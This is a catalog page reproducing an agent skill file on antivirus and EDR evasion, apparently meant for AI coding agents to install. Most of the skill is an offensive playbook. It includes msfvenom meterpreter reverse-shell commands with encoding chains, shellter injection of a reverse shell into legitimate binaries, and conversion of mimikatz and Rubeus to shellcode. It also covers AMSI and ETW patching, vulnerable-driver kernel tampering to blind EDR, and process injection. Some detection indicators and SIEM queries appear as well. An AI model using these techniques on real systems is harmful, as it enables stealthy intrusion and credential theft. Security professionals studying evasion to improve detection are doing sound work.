Source profileQuality 93/100

brucesongs/kali-claw/skills/av-edr-evasion/SKILL.md

av-edr-evasion

AV/EDR evasion covers techniques for bypassing antivirus (AV) and Endpoint Detection/Response (EDR) solutions during payload delivery, execution, and post-exploitation.

Source repository stars
65
Declared platforms
2
Static risk flags
1
Last source update
2026-08-19
Source checked
2026-08-25

Decision brief

What it does: where it fits

Supplementary Files: - payloads.md -- AV/EDR evasion payload collection: payload generation with msfvenom, PE injection with shellter, framework evasion with veil, .NET shellcode with donut, PE-to-shellcode conversion with pe2shc, encryption with hyperion, custom crypter techniq…

Best for

  • Payload Delivery in Monitored Environments -- Generate payloads that bypass endpoint protection during initial access and delivery phases
  • Post-Exploitation Tool Execution -- Execute tools and frameworks on endpoints where AV/EDR would normally flag offensive tooling
  • Red Team Engagement Delivery -- Prepare and test phishing attachments,droppers, and loaders that must evade enterprise EDR

Not for

  • Relying on a single evasion layer: Encoding alone (e.g., shikataganai) no longer bypasses modern AV. Layer encoding, encryption, and injection techniques together. A payload that passes static analysis may still trigger…
  • Testing only against Windows Defender: Enterprise environments run commercial EDR products (CrowdStrike, SentinelOne, Carbon Black) that use kernel-level telemetry, not just signature matching. A payload that evades Def…

Compatibility matrix

Platform support, with evidence labels

PlatformStatusEvidenceWhat to check
CodexNot declaredNo explicit evidencePortability before use
Claude CodeDeclaredSource recordInstall path and trigger
CursorDeclaredSource recordInstall path and trigger
Gemini CLINot declaredNo explicit evidencePortability before use
Open the compatibility checker

Installation

Inspect first. Install second.

The source command is displayed only when detected. A safe inspection prompt is always available so your agent can explain every action before execution.

Source-detected install commandSource
npx skills add https://github.com/brucesongs/kali-claw --skill "skills/av-edr-evasion"
Safe inspection promptEditorial

Inspect the Agent Skill "av-edr-evasion" from https://github.com/brucesongs/kali-claw/blob/a3205f5484ca8fec9fd809f3c16fe41fbc6ac87e/skills/av-edr-evasion/SKILL.md at commit a3205f5484ca8fec9fd809f3c16fe41fbc6ac87e. List every install step, command, network request, credential, file read/write, external action, and rollback step. Explain whether it fits my task. Do not install or execute anything until I approve.

Workflow

What the source asks the agent to do

  1. 01

    Process Injection Stealth

    Process hollowing over CreateRemoteThread: Replace legitimate process memory; appears as legitimate process.

    Process hollowing over CreateRemoteThread: Replace legitimate process memory; appears as legitimate process.Reflective DLL injection: Load DLL from memory; no file on disk; bypasses AV scanning.APC injection: Queue APC to existing threads; no CreateRemoteThread call.
  2. 02

    Summary

    Av Edr Evasion skill domain covering exploitation operations.

    Av Edr Evasion skill domain covering exploitation operations.Tools: shellter, veil, msfvenom, donut, pe2shc, hyperion, crypterMITRE ATT&CK: TA0005-Defense Evasion
  3. 03

    Description

    AV/EDR evasion covers techniques for bypassing antivirus (AV) and Endpoint Detection/Response (EDR) solutions during payload delivery, execution, and post-exploitation. This skill focuses on defeating static analysis (signature-based detection), dynamic analysis (behavioral moni…

    Static Analysis Bypass: Encoding, encryption, and obfuscation to defeat signature matching and YARA rulesBehavioral Evasion: Direct syscalls, API unhooking, and living-off-the-land binaries to avoid behavioral detectionIn-Memory Execution: Reflective loading, process injection, and shellcode runners that avoid disk-based detection
  4. 04

    Use Cases

    1. Payload Delivery in Monitored Environments -- Generate payloads that bypass endpoint protection during initial access and delivery phases 2. Post-Exploitation Tool Execution -- Execute tools and frameworks on endpoints where AV/EDR would normally flag offensive tooling 3. Red…

    Payload Delivery in Monitored Environments -- Generate payloads that bypass endpoint protection during initial access and delivery phasesPost-Exploitation Tool Execution -- Execute tools and frameworks on endpoints where AV/EDR would normally flag offensive toolingRed Team Engagement Delivery -- Prepare and test phishing attachments,droppers, and loaders that must evade enterprise EDR
  5. 05

    Core Tools

    Review the “Core Tools” section in the pinned source before continuing.

    Review and apply the “Core Tools” source section.

Permission review

Static risk signals and limitations

Reads files

low · line 211

The documentation asks the agent to read local files, directories, or repositories.

**Reflective DLL injection**: Load DLL from memory; no file on disk; bypasses AV scanning.

Evidence record

Why each signal appears

EvidenceSourceComputedTestedEditorial
SignalValueEvidence typeMeaning
Quality score93/100ComputedDocumentation, specificity, maintenance, and trust rules
Repository stars65SourceRepository attention, not individual Skill quality
Compatibility2 platformsSourceDeclared in the catalog source record
Usage guideautomated source guideEditorialGenerated or reviewed according to the visible evidence level

Pinned source

Provenance and original SKILL.md

Repository
brucesongs/kali-claw
Skill path
skills/av-edr-evasion/SKILL.md
Commit
a3205f5484ca8fec9fd809f3c16fe41fbc6ac87e
License
MIT
Collected
2026-08-25
Default branch
main
View the original SKILL.md

Skill: AV/EDR Evasion

Supplementary Files:

  • payloads.md -- AV/EDR evasion payload collection: payload generation with msfvenom, PE injection with shellter, framework evasion with veil, .NET shellcode with donut, PE-to-shellcode conversion with pe2shc, encryption with hyperion, custom crypter techniques
  • test-cases.md -- 6 structured test cases covering shellter PE injection, veil payload generation, msfvenom multi-encoder chains, donut .NET assembly conversion, pe2shc PE-to-shellcode conversion, and hyperion encryption

Summary

Av Edr Evasion skill domain covering exploitation operations.

Tools: shellter, veil, msfvenom, donut, pe2shc, hyperion, crypter

Domain: exploitation

MITRE ATT&CK: TA0005-Defense Evasion

Description

AV/EDR evasion covers techniques for bypassing antivirus (AV) and Endpoint Detection/Response (EDR) solutions during payload delivery, execution, and post-exploitation. This skill focuses on defeating static analysis (signature-based detection), dynamic analysis (behavioral monitoring), and heuristic detection used by commercial security products such as Windows Defender, CrowdStrike Falcon, SentinelOne, Carbon Black, and similar platforms.

The core principle is understanding how detection engines work so that payloads can be modified to avoid triggering their rules. Static detection relies on file hashes, byte patterns, and YARA signatures. Dynamic detection monitors API calls, process trees, network connections, and registry modifications. EDR platforms aggregate telemetry from ETW (Event Tracing for Windows), kernel callbacks, and memory scanning to build a behavioral profile of running code.

Key Evasion Surfaces:

  • Static Analysis Bypass: Encoding, encryption, and obfuscation to defeat signature matching and YARA rules
  • Behavioral Evasion: Direct syscalls, API unhooking, and living-off-the-land binaries to avoid behavioral detection
  • In-Memory Execution: Reflective loading, process injection, and shellcode runners that avoid disk-based detection
  • AMSI Bypass: Defeating the Anti-Malware Scan Interface used by Windows Defender and PowerShell
  • ETW Patching: Disabling Event Tracing for Windows to blind EDR telemetry collection

Use Cases

  1. Payload Delivery in Monitored Environments -- Generate payloads that bypass endpoint protection during initial access and delivery phases
  2. Post-Exploitation Tool Execution -- Execute tools and frameworks on endpoints where AV/EDR would normally flag offensive tooling
  3. Red Team Engagement Delivery -- Prepare and test phishing attachments,droppers, and loaders that must evade enterprise EDR
  4. C2 Agent Deployment -- Deploy command-and-control agents that survive behavioral monitoring and periodic scans
  5. Lateral Movement Tool Transfer -- Move tools between hosts without triggering file-transfer or execution alerts

Core Tools

ToolPurposeCommand Example
shellterPE file infection with shellcode injection (preserves original functionality)shellter --file legit.exe --payload reverse_tcp --lhost 10.0.0.1 --lport 4444
veilEvasion framework generating obfuscated payloads in multiple languagesveil -t Evasion -p 1 --msfvenom --list
msfvenomMetasploit payload generator with encoding and format optionsmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload.exe
donutGenerate x86/x64 shellcode from .NET assemblies, VBScript, and PE filesdonut -i Rubeus.exe -p "kerberoast" -o rubeus.bin
pe2shcConvert PE executables to position-independent shellcodepe2shc mimikatz.exe mimikatz.bin
hyperionEncrypt PE files with AES-128 to bypass static detectionhyperion payload.exe encrypted.exe
crypterCustom payload encryption wrapper for evading signature detectionVaries by implementation

Methodology

Attack Chain

[1] Assess               [2] Prepare              [3] Obfuscate
  - Identify AV/EDR        - Generate base           - Encode with msfvenom
  - Detection capabilities   payload (msfvenom/       encoders (multi-iteration)
  - Test baseline            custom shellcode)       - Encrypt with hyperion
  - Sandbox fingerprint    - Choose payload type     - Inject with shellter
       |                        |                    - Obfuscate with veil
       v                        v                        |
[4] Convert              [5] Test                 [6] Deliver
  - PE to shellcode         - Test against local     - Deploy via approved
    (pe2shc)                  AV (Windows Defender)   delivery mechanism
  - .NET assembly to       - Submit to sandbox        - Execute via LOLBin
    shellcode (donut)        (any.run, hybrid           - Verify C2 callback
  - Reflective loading       analysis)

Phase Details:

  1. Assess -- Identify the target AV/EDR product and version, understand its detection capabilities (signature, heuristic, behavioral), and test baseline detection rates. Fingerprinting the endpoint protection determines which evasion techniques are most likely to succeed.
  2. Prepare -- Generate a base payload using msfvenom, custom shellcode, or a post-exploitation tool. Choose the appropriate payload type (staged vs. stageless, x86 vs. x64) and output format based on the delivery vector.
  3. Obfuscate -- Apply encoding chains (shikata_ga_nai, xor), encryption (hyperion AES-128), PE injection (shellter), or framework-level evasion (veil) to defeat static analysis. Layering multiple techniques increases evasion success.
  4. Convert -- Transform payloads into formats that bypass specific detection layers: PE-to-shellcode conversion with pe2shc, .NET assembly shellcode generation with donut, or reflective DLL injection for in-memory execution.
  5. Test -- Verify evasion effectiveness against the target AV/EDR product. Use local testing (Windows Defender on a test VM) and sandbox submission (any.run, hybrid analysis) to confirm detection rates before deployment.
  6. Deliver -- Deploy the evaded payload via the approved delivery mechanism (phishing attachment, web download, LOLBin execution, or lateral movement tool transfer). Verify successful execution and C2 callback.

Defense Perspective

Defense MeasureDescriptionEvasion Techniques Countered
Signature-based detectionYARA rules, hash matching, byte-pattern scanningEncoding chains, encryption, custom crypters
Heuristic analysisEmulation, entropy checks, suspicious API detectionPE injection, legitimate binary abuse
Behavioral monitoringProcess tree analysis, API call tracing, ETW telemetryDirect syscalls, API unhooking, LOLBins
AMSI (Anti-Malware Scan Interface)Script content scanning before executionAMSI bypass via memory patching
Memory scanningPeriodic scanning of process memory for injected codeSleep obfuscation, encryption-at-rest in memory
Kernel callbacksKernel-level monitoring of process/thread/image load eventsDKOM, driver manipulation

Practical Steps

1. Target AV/EDR Identification

Before crafting payloads, identify what protection is running on the target endpoint. Use OSINT, phishing telemetry, or network reconnaissance to determine the AV/EDR product and version.

2. Base Payload Generation

Use msfvenom to generate the initial payload with appropriate architecture, format, and connection parameters.

3. Encoding and Encryption

Apply msfvenom encoding chains (multiple iterations of shikata_ga_nai), hyperion AES encryption, or shellter PE injection to defeat static detection signatures.

4. Format Conversion

Convert payloads into delivery-appropriate formats: pe2shc for PE-to-shellcode, donut for .NET assemblies, or custom loaders for in-memory execution.

5. Evasion Testing

Test the final payload against the target AV/EDR and public sandboxes before deployment. Iterate on evasion techniques if detection occurs.

Detailed payloads in payloads.md, complete test checklist in test-cases.md.


Common Pitfalls

  • Relying on a single evasion layer: Encoding alone (e.g., shikata_ga_nai) no longer bypasses modern AV. Layer encoding, encryption, and injection techniques together. A payload that passes static analysis may still trigger behavioral detection when it executes.
  • Testing only against Windows Defender: Enterprise environments run commercial EDR products (CrowdStrike, SentinelOne, Carbon Black) that use kernel-level telemetry, not just signature matching. A payload that evades Defender may be immediately caught by EDR behavioral rules.
  • Ignoring staging vs. stageless trade-offs: Staged payloads (meterpreter/reverse_tcp) download a second stage over the network, which EDR can intercept. Stageless payloads are larger and more likely to trigger static detection but avoid network-based detection. Choose based on the target's detection capabilities.

Automation and Scripting

Automate payload generation and testing by scripting msfvenom with encoding chains and piping the output directly into hyperion for encryption, then submitting the result to an AV testing API for automated detection scoring. Build a shell script that iterates through veil evasion modules and records which payloads achieve zero detections. Use pe2shc and donut in CI/CD pipelines to automatically convert post-exploitation tools into shellcode formats as part of red team infrastructure setup. Script AMSI bypass testing by launching PowerShell with different bypass techniques and measuring which ones allow known-malicious script content to execute without triggering Defender.

Reporting and Documentation

AV/EDR evasion findings should document the specific protection product and version tested, which evasion techniques succeeded and failed, detection scores from public sandboxes, and the complete build chain used to generate the evaded payload. Include the exact msfvenom command, encoding iterations, encryption parameters, and any custom modifications. Report which behavioral detections fired (and which were bypassed) to help defenders understand coverage gaps. Map evasion failures to specific detection rules (signature ID, YARA rule name, or behavioral policy) when possible.

Legal and Ethical Considerations

AV/EDR evasion techniques must only be used within authorized penetration testing or red team engagements with explicit written permission. Submitting payloads to public sandboxes (VirusTotal, Hybrid Analysis) may share samples with AV vendors, causing detection signatures to be created for your payloads. Use malware scanning services with "no-distribution" policies (e.g., masturbator, virusbay) or local test VMs for payload testing during engagements. Never use evasion techniques to deploy actual malware, ransomware, or unauthorized access tools.

Integration with Other Tools

AV/EDR evasion techniques integrate directly with several adjacent skills. Payload generation with msfvenom connects to post-exploitation for meterpreter sessions and lateral movement. Shellcode injection with donut and pe2shc supports executing tools from other domains (mimikatz from password-attack, nmap from network-pentest) on monitored endpoints. AMSI bypass enables PowerShell-based web-auth-bypass and social-engineering attack chains on hardened endpoints. Process injection techniques overlap with binary-reverse for understanding PE structures and code signing.

Case Studies and Examples

  • Shellter injection into legitimate tool: A red team injected shellcode into a legitimate signed utility (Sysinternals tool) using shellter's automatic mode. The resulting binary passed Windows Defender and CrowdStrike static analysis because the original digital signature structure was preserved and the injected shellcode was encrypted within the PE sections.
  • Multi-layer encoding bypass: A penetration tester used msfvenom with 10 iterations of shikata_ga_nai followed by hyperion AES encryption to generate a payload that achieved zero detections on VirusTotal. The key was combining two different evasion techniques (encoding and encryption) rather than relying on either one alone.
  • Donut for .NET tool execution: During an engagement, the Rubeus.exe Kerberos attack tool was converted to shellcode using donut and loaded via a custom reflective loader. This bypassed endpoint protection that was specifically looking for Rubeus.exe file hashes and PowerShell invocation patterns.

Detection and Evasion

Defenders detect evasion attempts through multiple indicators: high entropy in PE sections (suggesting encryption or packing), injection-related API calls (VirtualAllocEx, WriteProcessMemory, CreateRemoteThread), anomalous parent-child process relationships, reflective DLL loading patterns, and AMSI bypass attempts in PowerShell command-line logging. To maximize evasion: combine encoding with encryption, use legitimate binaries as hosts (shellter), execute in memory rather than writing to disk, leverage LOLBins for execution, and patch ETW providers to blind EDR telemetry. Sleep obfuscation techniques (encrypting memory while sleeping) help evade periodic memory scans.

Advanced Techniques

Advanced AV/EDR evasion includes: direct syscall invocation (bypassing ntdll hooks by resolving syscall numbers dynamically), API unhooking (restoring original ntdll bytes from a clean copy on disk), hardware breakpoint injection (using Vectored Exception Handling instead of hooks), process doppelganging (using NTFS transactions to run modified executables without touching disk), and sleep obfuscation (encrypting in-memory payloads between callback intervals). For .NET payloads, AMSI bypass via memory patching (zeroing the AMSI initialize function) combined with assembly loading from byte arrays avoids file-based detection entirely.

Tool Comparison Matrix

ToolBest ForSpeedEvasion QualitySkill Level
shellterPE injection into legitimate binariesModerateHigh (preserves signatures)Beginner
veilFramework-level payload generationFastModerateBeginner
msfvenomBase payload + encoding chainsFastModerate (encoding alone)Beginner
donut.NET assembly to shellcode conversionFastHigh (in-memory execution)Intermediate
pe2shcPE to position-independent shellcodeFastHigh (enables loaders)Intermediate
hyperionAES encryption of PE filesModerateModerate-HighBeginner

Detection Methods

AV/EDR Telemetry Indicators

  • AMSI scan failures: Event ID 1100 (Windows Defender stopped); Event ID 2000-2004 (real-time protection disabled).
  • LSASS access: Non-system process accessing lsass.exe memory; Sysmon Event ID 10.
  • Suspicious process injection: CreateRemoteThread + VirtualAllocEx + WriteProcessMemory chain.
  • PSExec / WMI lateral movement: Sysmon Event ID 1 with parent services.exe or wmiprvse.exe.
  • PatchGuard triggers: BSOD with KERNEL_AUTO_BOOST_INVALID_LOCK_RELEASE (kernel callback tampering).
  • Driver loading: Unsigned driver loads; Event ID 6 (Sysmon); Event ID 4688 (process start with signature).

Behavioral Indicators

  • Process hollowing: Legitimate process (e.g., svchost.exe) with mismatched PE header vs disk image.
  • Reflective DLL loading: DLL loaded from memory (no file on disk); memory region with RWX permissions.
  • Direct syscall: Process executing syscalls without going through ntdll.dll (signature of syscall stub bypass).
  • Token impersonation: Process holding tokens of multiple users; unusual for legitimate services.

SIEM Detection Rules

  • Splunk SPL: index=windows sourcetype=XmlWinEventLog:Microsoft-Windows-Sysmon/Operational EventCode=10 TargetImage="*lsass.exe"
  • Sigma rule: sigma/rules/windows/sysmon_lsass_access.yml
  • Microsoft Defender for Endpoint: Native EDR detections for credential theft, process injection.
  • CrowdStrike / SentinelOne: Process ancestry analysis catches most injection patterns.

Defense Evasion Techniques

AMSI/ETW Bypass

  • AMSI patch: Patch amsi.dll!AmsiScanBuffer to return AMSI_RESULT_CLEAN always (0x80070057).
  • ETW patch: Patch ntdll!EtwEventWrite to return success without logging.
  • CLR hooking: Hook .NET CLR to prevent assembly load events from being raised.
  • AMSI unload: Force-unload amsi.dll from process memory before payload execution.
  • Provider disable: Disable specific ETW providers via registry (HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WINEVT\Channels).

Direct Syscalls

  • SysWhispers2 / SysWhispers3: Generate custom syscall stubs without ntdll imports.
  • HellsGate / HalosGate: Dynamically resolve SSNs by parsing ntdll at runtime.
  • Native API abuse: Use Nt* APIs directly via syscall; bypasses user-mode hooks.
  • Indirect syscalls: Use legitimate ntdll.dll returns address but custom syscall instruction.

Process Injection Stealth

  • Process hollowing over CreateRemoteThread: Replace legitimate process memory; appears as legitimate process.
  • Reflective DLL injection: Load DLL from memory; no file on disk; bypasses AV scanning.
  • APC injection: Queue APC to existing threads; no CreateRemoteThread call.
  • Thread hijacking: Suspend existing thread, modify context, resume; no new thread creation.
  • EarlyBird injection: Queue APC before main thread starts; runs in legitimate process startup.

Driver / Kernel Bypass

  • BYOVD (Bring Your Own Vulnerable Driver): Load legitimately-signed but vulnerable driver (RTCore64.sys, gdrv.sys); use it for kernel R/W.
  • DSE bypass: Disable Driver Signature Enforcement via boot modifications or kernel exploits.
  • Kernel callback removal: Remove PsSetCreateProcessNotifyRoutine callbacks; blind EDR.

EDR Splitting

  • Operation splitting: Spread payload across multiple processes; each does partial work; no single process triggers.
  • Cross-process token theft: Steal token in one process, use in another; confuses EDR correlation.
  • Lateral via WMI/DCOM: Use WMI subscriptions and DCOM to avoid PsExec/WinRM signatures.

Memory-Only Operations

  • memfd_create: Linux; run payload from memory-backed file.
  • Reflective loading: Map PE into process memory without LoadLibrary.
  • Module stomping: Load legitimate DLL, overwrite with payload; appears as legitimate module.
  • Phantom DLL hollowing: Hollow a DLL that is loaded but not actually used.

Performance and Remediation

Payload generation with msfvenom encoding chains is fast (seconds for most payloads), but higher iteration counts (i > 10) produce diminishing returns as modern AV uses entropy-based detection. Hyperion encryption adds approximately 50KB overhead to PE files. Donut shellcode generation from large .NET assemblies (e.g., Rubeus, Seatbelt) produces shellcode binaries of 500KB-2MB, which may trigger size-based heuristics. Prioritize evasion by defense layer: first defeat static analysis (encoding/encryption), then address behavioral detection (in-memory execution, direct syscalls), and finally handle memory scanning (sleep obfuscation). For defenders: layer signature-based, heuristic, behavioral, and memory-scanning detection; do not rely solely on any single detection method.

Hacker Laws

  1. Know Your Enemy -- Effective evasion requires understanding how the target detection engine works. Study the AV/EDR architecture (user-mode hooks, kernel callbacks, ETW providers) before choosing evasion techniques. Blindly applying encoding rarely works against modern EDR.
  2. Defense in Depth Applies to Attackers Too -- Layer multiple evasion techniques (encoding + encryption + injection + behavioral evasion) rather than relying on a single method. Each layer addresses a different detection mechanism.
  3. Living Off the Land -- The most reliable evasion uses tools and binaries already present on the target system (PowerShell, certutil, mshta, wscript). Legitimate system tools are inherently trusted and rarely flagged by behavioral rules.

Learning Resources

This skill's supplementary files: payloads.md, test-cases.md Related skills: skills/post-exploitation/SKILL.md, skills/binary-reverse/SKILL.md, skills/password-attack/SKILL.md External resources:

Frequently asked questions

What to verify before installation and use

What does the av-edr-evasion source document cover?

Supplementary Files: - payloads.md -- AV/EDR evasion payload collection: payload generation with msfvenom, PE injection with shellter, framework evasion with veil, .NET shellcode with donut, PE-to-shellcode conversion with pe2shc, encryption with hyperion, custom crypter techniq…

How do I install av-edr-evasion?

The source record exposes this install command: npx skills add https://github.com/brucesongs/kali-claw --skill "skills/av-edr-evasion". Inspect the command and pinned source before running it.

Which Agent platforms does the source record declare?

The pinned source record declares support for: claude code, cursor.

Which permission-related actions were detected?

Static rules flagged read-files in the source; the page lists the matching lines and excerpts.

Alternatives

Compare before choosing

Computed 97203

PramodDutta/qaskills

RAG Regression Testing

Gate RAG pipelines in CI with versioned golden eval sets, per-metric thresholds, baseline drift detection, and a build that fails when retrieval or answer quality regresses.

Computed 97203

PramodDutta/qaskills

State Machine Test Generator

Generate comprehensive test cases from state machine models covering all states, transitions, guard conditions, and invalid transition attempts for workflow-heavy features

Computed 9620

upex-galaxy/agentic-qa-boilerplate

regression-testing

Execute regression test suites via CI/CD, analyze results, classify failures, and produce GO/NO-GO release decisions. Use when running regression, smoke, or sanity suites through GitHub Actions, monitoring workflow runs, downloading Allure or Playwright artifacts, classifying failures (REGRESSION vs FLAKY vs KNOWN vs ENVIRONMENT vs NEW TEST), computing pass-rate and trend metrics, deciding release readiness, generating executive quality reports, or creating regression issues. Triggers on: run re

Computed 967

aomi-labs/skills

aomi-build

Scaffold new Aomi apps and plugins from API docs, OpenAPI/Swagger specs, or SDK references. aomi-build generates production-ready Rust SDK crates (lib.rs, client.rs, tool.rs) with tool schemas, preambles, host-interop flows, and validation — turning a vendor's API surface into AI-agent-callable tools. It covers the current `aomi-build` OpenAPI pipeline (`gen-specs` → `gen-client` → `gen-tool` → curate → compile/test) as well as greenfield apps. Use when the user wants to scaffold a new Aomi app